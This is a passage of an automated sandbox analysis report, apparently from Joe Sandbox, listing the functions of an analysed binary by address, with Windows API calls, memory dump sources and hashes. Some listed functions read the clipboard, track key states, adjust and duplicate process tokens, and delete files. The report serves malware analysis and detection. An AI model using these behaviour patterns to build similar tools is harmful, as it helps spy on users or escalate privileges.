                                                                                                                                                  • Instruction Fuzzy Hash: 2D0119742042019FD321EF5DD541F06BBE1AF69310F24C49AF5888B392DBB2E851CF90
                                                                                                                                                  Function 00BFDC5A Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BE0FE6: std::exception::exception.LIBCMT ref: 00BE101C
                                                                                                                                                    • Part of subcall function 00BE0FE6: __CxxThrowException@8.LIBCMT ref: 00BE1031
                                                                                                                                                  • _memmove.LIBCMT ref: 00BFDC8B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Exception@8Throw_memmovestd::exception::exception
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1602317333-0
                                                                                                                                                  • Opcode ID: 45a849d2a6824c2a98c98ed0063ef32583db97a8290c264e89d73d06c63a9186
                                                                                                                                                  • Instruction ID: 3bef9ef8a355655a0ec709404b7fdfed209cd792e91e4f609d985d05e9429680
                                                                                                                                                  • Opcode Fuzzy Hash: 45a849d2a6824c2a98c98ed0063ef32583db97a8290c264e89d73d06c63a9186
                                                                                                                                                  • Instruction Fuzzy Hash: B4F01D74604142DFD714EF68C991E19BBE1FF1A310B2484DCE1898B3A2E773E961CB91
                                                                                                                                                  Function 00BD4A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _fseek
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2937370855-0
                                                                                                                                                  • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                                                                                  • Instruction ID: f138c6824f676d7eb3910d1432f1bf9e8fa7eb63e7a39240eabdd5f60a19ac4b
                                                                                                                                                  • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                                                                                  • Instruction Fuzzy Hash: 85F085B6400208BFDF108F85DC00CEBBBB9EB89324F108198F9045A210D372EA619BA0
                                                                                                                                                  Function 00BD4A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00BD27AF,?,00000001), ref: 00BD4A63
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                  • Opcode ID: 2996ecaa5c8388fdf9a4bff5a09cf1fef7f74ed74061aa05a5ad4eb79ee63bee
                                                                                                                                                  • Instruction ID: a76fe1f2c8b3d0e569cf58bd01d11da259130c84bf06bb35e06d1f9fdb914786
                                                                                                                                                  • Opcode Fuzzy Hash: 2996ecaa5c8388fdf9a4bff5a09cf1fef7f74ed74061aa05a5ad4eb79ee63bee
                                                                                                                                                  • Instruction Fuzzy Hash: F8F0F271145B12CFCB349F64E49081AFBE0EB1432A32089AEE19A82610D7319984DB44
                                                                                                                                                  Function 00BD4AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __fread_nolock
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2638373210-0
                                                                                                                                                  • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                                                                                  • Instruction ID: 971488d83d8b55a1723f0a651272a7a4d6a3c812955f5ad1c7ecd6e1a04d1864
                                                                                                                                                  • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                                                                                  • Instruction Fuzzy Hash: D3F0F87240020DFFDF05CF90C941EAABBB9FB15314F208589F9198A212D376DA61ABA1
                                                                                                                                                  Function 00C00A79 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ef387b61ae8894ab7a05e941b9cba548826afd88a4b06bcef41d0ec220906660
                                                                                                                                                  • Instruction ID: 17839a397096bfccf624888a6d6ce0bb1b664b6b368f95a6c1c0a5af5fb72d58
                                                                                                                                                  • Opcode Fuzzy Hash: ef387b61ae8894ab7a05e941b9cba548826afd88a4b06bcef41d0ec220906660
                                                                                                                                                  • Instruction Fuzzy Hash: 7CE09BB27483465EE7309B6AD404F66FBD8EB00311F31459ED496C12C1E7755894EBA2
                                                                                                                                                  Function 00BE09C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,00BD31F7), ref: 00BE09E4
                                                                                                                                                    • Part of subcall function 00BD1821: _memmove.LIBCMT ref: 00BD185B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LongNamePath_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2514874351-0
                                                                                                                                                  • Opcode ID: b576dd5991f076b81af42639a16ab6639b777b4e50288479105d6c0570b966c6
                                                                                                                                                  • Instruction ID: 76a7eecedfb015734fa492c31d7f4cfcbd1df49af2680687e82ae108711b1d80
                                                                                                                                                  • Opcode Fuzzy Hash: b576dd5991f076b81af42639a16ab6639b777b4e50288479105d6c0570b966c6
                                                                                                                                                  • Instruction Fuzzy Hash: 39E0863690022857C721D69C9C05FEEB7DDDB89791F0405F6FD08D7314E9619C818691
                                                                                                                                                  Function 00C24FEC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,00C23BFE), ref: 00C24FED
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                  • Opcode ID: 1ffd18f08e8adfc7d4409605350fef0d69d434ba8f4ed73edbeb69bdf6147284
                                                                                                                                                  • Instruction ID: fd65d27e51ee3e19bad59ed848c9dd6da86851301b7b3764e7ac82267c787639
                                                                                                                                                  • Opcode Fuzzy Hash: 1ffd18f08e8adfc7d4409605350fef0d69d434ba8f4ed73edbeb69bdf6147284
                                                                                                                                                  • Instruction Fuzzy Hash: 1DB09238000A10579D2C1E7C6A4829E330158823AA7EB1B81E47A958E19639898BA531
                                                                                                                                                  Function 00BE547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __wfsopen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 197181222-0
                                                                                                                                                  • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                                  • Instruction ID: 6c96f28393582aff8563baa3703a93707b1a944e1bfe1743a6dcd1f9d1859ffc
                                                                                                                                                  • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                                  • Instruction Fuzzy Hash: 47B0927644020C77CE122A82EC03A593B699B40668F408060FB0C1C2A2A673A6A09689
                                                                                                                                                  Function 00C2C270 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00C24005: FindFirstFileW.KERNEL32(?,?), ref: 00C2407C
                                                                                                                                                    • Part of subcall function 00C24005: DeleteFileW.KERNEL32(?,?,?,?), ref: 00C240CC
                                                                                                                                                    • Part of subcall function 00C24005: FindNextFileW.KERNEL32(00000000,00000010), ref: 00C240DD
                                                                                                                                                    • Part of subcall function 00C24005: FindClose.KERNEL32(00000000), ref: 00C240F4
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00C2C292
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2191629493-0
                                                                                                                                                  • Opcode ID: ee02095b75ef1bfdd5ae5f00058110fe40067be45536695ff11369f6dead0cd2
                                                                                                                                                  • Instruction ID: 8a7175e3d026a69dfa741ee4d0d34ca9e9815faf6f3e138f3b2c4f2238aa52e2
                                                                                                                                                  • Opcode Fuzzy Hash: ee02095b75ef1bfdd5ae5f00058110fe40067be45536695ff11369f6dead0cd2
                                                                                                                                                  • Instruction Fuzzy Hash: 85F08C322102108FCB14EF59E850F6EB7E5AF98320F0580A9F94A9B362CB70BD41CB94

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 00C4D164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BC29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,00BC1CE4,?), ref: 00BC29F3
                                                                                                                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C4D208
                                                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000,?,?,?), ref: 00C4D249
                                                                                                                                                  • GetWindowLongW.USER32(FFFFFDD9,000000F0,?,?,?), ref: 00C4D28E
                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C4D2B8
                                                                                                                                                  • SendMessageW.USER32 ref: 00C4D2E1
                                                                                                                                                  • _wcsncpy.LIBCMT ref: 00C4D359
                                                                                                                                                  • GetKeyState.USER32(00000011,?,?,?), ref: 00C4D37A
                                                                                                                                                  • GetKeyState.USER32(00000009), ref: 00C4D387
                                                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C4D39D
                                                                                                                                                  • GetKeyState.USER32(00000010), ref: 00C4D3A7
                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000,?,?,?), ref: 00C4D3D0
                                                                                                                                                  • SendMessageW.USER32 ref: 00C4D3F7
                                                                                                                                                  • SendMessageW.USER32(?,00001030,?,00C4B9BA,?,?,00000000,?,?,?,?,?,?), ref: 00C4D4FD
                                                                                                                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C4D513
                                                                                                                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C4D526
                                                                                                                                                  • SetCapture.USER32(?), ref: 00C4D52F
                                                                                                                                                  • ClientToScreen.USER32(?,?,?,?,00000001,@GUI_DRAGID), ref: 00C4D594
                                                                                                                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C4D5A1
                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C4D5BB
                                                                                                                                                  • ReleaseCapture.USER32(?,?,?), ref: 00C4D5C6
                                                                                                                                                  • GetCursorPos.USER32(?,?,00000001,?,?,?), ref: 00C4D600
                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00C4D60D
                                                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?,?), ref: 00C4D669
                                                                                                                                                  • SendMessageW.USER32 ref: 00C4D697
                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?,?), ref: 00C4D6D4
                                                                                                                                                  • SendMessageW.USER32 ref: 00C4D703
                                                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C4D724
                                                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C4D733
                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00C4D753
                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00C4D760
                                                                                                                                                  • GetParent.USER32(?,?), ref: 00C4D780
                                                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?,?), ref: 00C4D7E9
                                                                                                                                                  • SendMessageW.USER32 ref: 00C4D81A
                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00C4D878
                                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C4D8A8
                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?,?), ref: 00C4D8D2
                                                                                                                                                  • SendMessageW.USER32 ref: 00C4D8F5
                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00C4D947
                                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C4D97B
                                                                                                                                                    • Part of subcall function 00BC29AB: GetWindowLongW.USER32(?,000000EB,?,?,?,00BC1AE0,?,?,?,?,?,?,00BC1D8F,?,?,?), ref: 00BC29BC
                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0,?,?,?,?,?,?,?), ref: 00C4DA17
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                                  • String ID: @GUI_DRAGID$F
                                                                                                                                                  • API String ID: 3977979337-4164748364
                                                                                                                                                  • Opcode ID: 838a32e84957d42ccaac476b7dbf8703423314d04fb691530be212b58553cde8
                                                                                                                                                  • Instruction ID: cfc6dc04bf61f37a5f3b0e04a370a78b0a91fc732bca601055dfabe6c699817a
                                                                                                                                                  • Opcode Fuzzy Hash: 838a32e84957d42ccaac476b7dbf8703423314d04fb691530be212b58553cde8
                                                                                                                                                  • Instruction Fuzzy Hash: 2642AD74204341AFD721EF28C848B6EBBE5FF49320F24061DFAA6972A1DB71D954CB52
                                                                                                                                                  Function 00C18F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00C19399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C193E3
                                                                                                                                                    • Part of subcall function 00C19399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C19410
                                                                                                                                                    • Part of subcall function 00C19399: GetLastError.KERNEL32 ref: 00C1941D
                                                                                                                                                  • _memset.LIBCMT ref: 00C18F71
                                                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00C18FC3
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00C18FD4
                                                                                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000,?,?,?,00000001,?,?), ref: 00C18FEB
                                                                                                                                                  • GetProcessWindowStation.USER32 ref: 00C19004
                                                                                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 00C1900E
                                                                                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C19028
                                                                                                                                                    • Part of subcall function 00C18DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C18F27), ref: 00C18DFE
                                                                                                                                                    • Part of subcall function 00C18DE9: CloseHandle.KERNEL32(?,?,00C18F27), ref: 00C18E10
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                  • String ID: $default$winsta0
                                                                                                                                                  • API String ID: 2063423040-1027155976
                                                                                                                                                  • Opcode ID: 67a14be8cecfdc15942c4e4963f96c1064c5295de105d6ea86b8a7bda99d11f7
                                                                                                                                                  • Instruction ID: 89f9124cc07afde1bde178523115b4fa92d4b5d37046beec9397eb6df3143c2c
                                                                                                                                                  • Opcode Fuzzy Hash: 67a14be8cecfdc15942c4e4963f96c1064c5295de105d6ea86b8a7bda99d11f7
                                                                                                                                                  • Instruction Fuzzy Hash: 73817D75800209FFDF119FA4CC59AEE7BB9EF06304F248159F924B2261DB319E95EB60
                                                                                                                                                  Function 00C34632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • OpenClipboard.USER32(00C50980), ref: 00C3465C
                                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00C3466A
                                                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 00C34672
                                                                                                                                                  • CloseClipboard.USER32 ref: 00C3467E
                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00C3469A
                                                                                                                                                  • CloseClipboard.USER32 ref: 00C346A4
                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00C346B9
                                                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00C346C6
                                                                                                                                                  • GetClipboardData.USER32(00000001), ref: 00C346CE
                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00C346DB
                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00C3470F
                                                                                                                                                  • CloseClipboard.USER32(00000001,00000000), ref: 00C3481F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3222323430-0
                                                                                                                                                  • Opcode ID: 6949b61eab299941cf2a24a62883e0f1a522089bc6bfcdcc5a8ff9cdca0b2256
                                                                                                                                                  • Instruction ID: 0b409d98c6be8dbad20ad9c6e77e00add4cbdb79aac1c5abed6e811309e64269
                                                                                                                                                  • Opcode Fuzzy Hash: 6949b61eab299941cf2a24a62883e0f1a522089bc6bfcdcc5a8ff9cdca0b2256
                                                                                                                                                  • Instruction Fuzzy Hash: 3F51C135244301ABD304EF64DC9AF6E77A8AF94B12F104529F956E22E1EF30E944CB62
                                                                                                                                                  Function 00C2CD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
